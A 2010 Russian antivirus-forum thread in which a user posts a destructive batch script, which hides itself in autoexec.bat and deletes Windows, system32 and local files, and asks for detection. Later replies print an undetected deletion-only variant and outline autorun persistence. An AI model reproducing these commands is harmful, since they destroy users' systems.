[ Закрыто ] Обнаружен код который ломает ОС и даже Bios, прошу обновить базы и найти подобные, вирусы. , Написан через блокнот вашем антивирусником не определяется, по этому прошу обеспечить максимальную защиту, нехочу вновь попасться на такую шутку, вирус запускается только при его открытии.

RSS

Размещено 21.04.2010 21:21:57

@Echo off
Echo вот ты и попал!!!
Date 21.12.12
If exist охринеть!!!.bat goto abc
:abc
Copy %0 охринеть!!!.bat
Attrib +h охринеть!!!.bat
Echo охринеть!!!.bat >>autoexec.bat
del c:Windows/q
del c:Windows\system32/q
del *.*/q

Label E: PRIDUROK
Echo НЕ ХОРОШО ОБИЖАТЬ ДЕВОЧЕК!!!

/q:
FOR /L %%i IN (1,1,1000) DO md %%i

start calc
start calc
start calc
start calc
start calc
start calc
---------------------------------------------------------------------------------------------------------------------------------------------
start calc - повторяется более 1000 раз!

Ответы

Пред. 1 2 3 4

Размещено 01.05.2010 22:10:47

Цитата

Voidwalker пишет:

Цитата
marshal64 пишет: Вирус в частности делает следующее: 1) изменяет системное время; 2) отключает антивирусную защиту; 3) удаляет папку Windows; 4) удаляет все остальное; 5) и начинает вызывать калькулятор)

Батник удаляет содержимое папки Windows (без подпапок), папки Windows\system32 (без подпапок), содержимое папки, откуда запущен. Антивирус он никаким боком не отключает, калькулятор вызвать не сможет, т.к. до этого уже удалил.

И вы это всё серьезно? Каждый, на коленке написанный (криво к тому же), батник будете в базы заносить?
Кстати, урезанный вариант (с сохраненным деструктивным функционалом) уже не детектится...

Код
@Echo off del c:Windows/q del c:Windows\system32/q del ./q

И кстати, интересно узнать, каким образом он "ломает даже BIOS"?

Ну насчёт BIOS по моему нет... но у меня был другой BAT вирус который мне отправили, вот из-за него у меня Bios затупил. Этот вирус наверно всё таки нет - никакого вреда для bios... нуу.. не знаю, я ведь его не проверял.

Размещено 01.05.2010 22:17:34

И насчёт темы, - её можно ЗАКРЫТЬ. Вирус уже детектируется и некоторые подобные этому - тоже определяются.

Изменено: Евгений Дудаладов - 01.05.2010 22:18:14

Сообщений: 20

Баллов: 10

Регистрация: 30.04.2010

Размещено 01.05.2010 23:00:25

Евгений Дудаладов, раз не проверял, нечего разводить панику и дезинформировать окружающих.

И еще раз, для "особо одаренных": командный файл вирусом не является по сути, т.к в нем отсутствует функция автозапуска. Если кому-то хватило ума запустить неизвестный файл, притом с правами админа (что является несоблюдением рекомендаций Микрософт, а будучи запущенным под пользователем, этот батник ничего сделать не сможет - у пользователя нет прав на запись в системные папки), тот сам себе злобный Буратино. Все это очень напоминает старый анекдот про т.н. "албанский вирус"... Но совсем не смешно...

И шпилька в сторону ТП: если уж заносите подобное чудо в базы, так делайте это корректно (см. пример выше), т.е. не по сигнатуре, а по функционалу.

Сообщений: 264

Баллов: 211

Регистрация: 02.04.2010

Размещено 02.05.2010 06:37:10

Цитата
Voidwalker пишет: Евгений Дудаладов, раз не проверял, нечего разводить панику и дезинформировать окружающих. И еще раз, для "особо одаренных": командный файл вирусом не является по сути, т.к в нем отсутствует функция автозапуска. Если кому-то хватило ума запустить неизвестный файл, притом с правами админа (что является несоблюдением рекомендаций Микрософт, а будучи запущенным под пользователем, этот батник ничего сделать не сможет - у пользователя нет прав на запись в системные папки), тот сам себе злобный Буратино. Все это очень напоминает старый анекдот про т.н. "албанский вирус"... Но совсем не смешно... И шпилька в сторону ТП: если уж заносите подобное чудо в базы, так делайте это корректно (см. пример выше), т.е. не по сигнатуре, а по функционалу.

Цитата

Voidwalker пишет:
Евгений Дудаладов, раз не проверял, нечего разводить панику и дезинформировать окружающих.

И еще раз, для "особо одаренных": командный файл вирусом не является по сути, т.к в нем отсутствует функция автозапуска. Если кому-то хватило ума запустить неизвестный файл, притом с правами админа (что является несоблюдением рекомендаций Микрософт, а будучи запущенным под пользователем, этот батник ничего сделать не сможет - у пользователя нет прав на запись в системные папки), тот сам себе злобный Буратино. Все это очень напоминает старый анекдот про т.н. "албанский вирус"... Но совсем не смешно...

И шпилька в сторону ТП: если уж заносите подобное чудо в базы, так делайте это корректно (см. пример выше), т.е. не по сигнатуре, а по функционалу.

Не могу полностью согласиться. На счет функции автозапуска - в бате можно свободно прописать на авторан несколькими способами. Способ первый - на самом бате прописать самокопирование файла в автозапуск, при этом давая атрибуты скрытый и системный. Способ номер 2 - с помощью команд бата можно создавать и редактировать файлы. Можно к примеру создать скприт, или например, файл реестра (хотя реестра нет - запросит система "Вы хотите добавить данные из ХХХ в реестр?" Батник пишет в содержимое файла изменения ключей, например, прописывает папки к оторых он поселится и все... вроде алгоритм правильный... Но это все не стоит того, чтобы для батника ставить автораны. Как правило вирусы на бате "одноразовые".

Изменено: ORION - 02.05.2010 06:39:36

Сообщений: 264

Баллов: 211

Регистрация: 02.04.2010

Размещено 02.05.2010 06:41:56

Цитата
ORION пишет: И шпилька в сторону ТП: если уж заносите подобное чудо в базы, так делайте это корректно

К твоему сведению большая часть вирусов обрабатывается компьютером, и добавляется в базу автоматически без участия человека. У вирусных аналитиков и так работы по уши.

Изменено: ORION - 02.05.2010 06:43:17

Сообщений: 20

Баллов: 10

Регистрация: 30.04.2010

Размещено 02.05.2010 14:43:40

ORION,
Рассматривать командный текстовый файл как вирус - по меньшей мере безграмотно. Максимум - как файл с потенциально опасным содержимым. А для этого нужно это содержимое выделить, что сделано не было, пример выше. Сколько работы у вир. аналитиков - мне, как конечному пользователю, глубоко индифферентно, они за за свою работу зарплату получают, так пускай отрабатывают. Есет всегда славился хорошим эвристиком, и тупое добавление сигнатуры, без функционального анализа, характеризует его отнюдь не с лучшей стороны.

Сообщений: 264

Баллов: 211

Регистрация: 02.04.2010

Размещено 02.05.2010 14:58:24

Цитата
Voidwalker пишет: ORION, Рассматривать командный текстовый файл как вирус - по меньшей мере безграмотно. Максимум - как файл с потенциально опасным содержимым. А для этого нужно это содержимое выделить, что сделано не было, пример выше. Сколько работы у вир. аналитиков - мне, как конечному пользователю, глубоко индифферентно, они за за свою работу зарплату получают, так пускай отрабатывают. Есет всегда славился хорошим эвристиком, и тупое добавление сигнатуры, без функционального анализа, характеризует его отнюдь не с лучшей стороны.

Цитата

Voidwalker пишет:
ORION,
Рассматривать командный текстовый файл как вирус - по меньшей мере безграмотно. Максимум - как файл с потенциально опасным содержимым. А для этого нужно это содержимое выделить, что сделано не было, пример выше. Сколько работы у вир. аналитиков - мне, как конечному пользователю, глубоко индифферентно, они за за свою работу зарплату получают, так пускай отрабатывают. Есет всегда славился хорошим эвристиком, и тупое добавление сигнатуры, без функционального анализа, характеризует его отнюдь не с лучшей стороны.

Говорю еще раз. Если бы все сигнатуры добавлялись в ручную, то я уверен, что ты бы сейчас не использовал этот антивирус, т.к. время реагирования на новые угрозы была бы очень медленная.Рассматривать бат файл как вирус - безграмотно... Кухонный нож тоже предназначен чтобы им нарезать продукты - а в руках маньяка он имеет свое значение. Это так, сравнение.

Изменено: ORION - 03.05.2010 00:51:46

Сообщений: 20

Баллов: 10

Регистрация: 30.04.2010

Размещено 04.05.2010 09:28:24

ORION,

Цитата
К твоему сведению большая часть вирусов обрабатывается компьютером, и добавляется в базу автоматически без участия человека.

Цитата
Если бы все сигнатуры добавлялись в ручную, то я уверен, что ты бы сейчас не использовал этот антивирус, т.к. время реагирования на новые угрозы была бы очень медленная.

Мде... К твоему сведению, есть такое расхожее выражение: "Иногда лучше жевать, чем говорить..."

Цитата
Кухонный нож тоже предназначен чтобы им нарезать продукты - а в руках маньяка он имеет свое значение. Это так, сравнение.

Совершенно не по теме и не к месту. Если не можешь предложить ничего конструктивного - см. выше, флудилка в другом месте.

(отвечать необязательно... и топик, действительно, лучше прикрыть, а еще лучше - удалить, чтобы не позориться...)

Изменено: Voidwalker - 04.05.2010 09:47:03 (опечатка)

Сообщений: 12962

Баллов: 10371

Регистрация: 16.03.2010

Размещено 04.05.2010 09:58:26

А может закончим флудить?

Идем сюда http://forum.esetnod32.ru/forum17/ и флудим сколько угодно!

Пред. 1 2 3 4